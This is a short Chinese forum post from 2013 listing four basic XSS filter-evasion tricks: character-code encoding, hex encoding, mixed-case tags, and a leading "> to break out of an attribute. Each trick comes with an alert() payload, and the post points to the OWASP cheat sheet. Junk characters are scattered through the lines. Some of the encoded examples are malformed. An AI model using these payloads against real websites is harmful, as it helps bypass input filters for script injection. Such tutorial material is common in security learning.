四种超级基础的绕过方法。
, X! V* B+ `) a! e# Y1.转换为ASCII码
. P( }! R4 |- w" D例子:原脚本为<script>alert(‘I love F4ck’)</script >
% y& g3 Q6 X3 H, q通过转换,变成:
5 P9 T H& W* Q5 Z<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>( O+ l( i t, q) }7 M
3 @- u: F8 _& D7 _) H8 O' I8 {2.转换为HEX(十六进制)+ n, {! |# A& N& U
例子:原脚本为<script>alert(‘I love F4ck’)</script>
4 R; d5 V+ w! P6 a1 s; I x通过转换,变成:- w' d; P2 ~6 p Z0 s
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
, P, L0 ^( z: \8 ] , d& `; a. v& ^" a) E
3.转换脚本的大小写
: C3 y: ] T, K; x* e- Q例子:原脚本为<script>alert(‘I love F4ck’)</script>
/ Z& Z* T' l; a( v转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>5 i- @! I7 g) F |
, j% i9 T. j# T# u; x7 u' @
4.增加闭合标记”>
{% c/ F4 t8 @' a) {例子:原脚本为<script>alert(‘I love F4ck’)</script>
. l( q- H: j$ ?! E8 ]转换为:”><script>alert(‘I love F4ck’)</script>
4 O7 R j( N! R) P& E! Q0 M更详细绕过技术请参考此网页+ t+ `2 [+ n1 U8 p
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
1 V0 P M6 @$ c$ R$ r2 O" o
4 m, i, _+ J% I. ]/ ]6 V6 h2 w转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
分享
支持
反对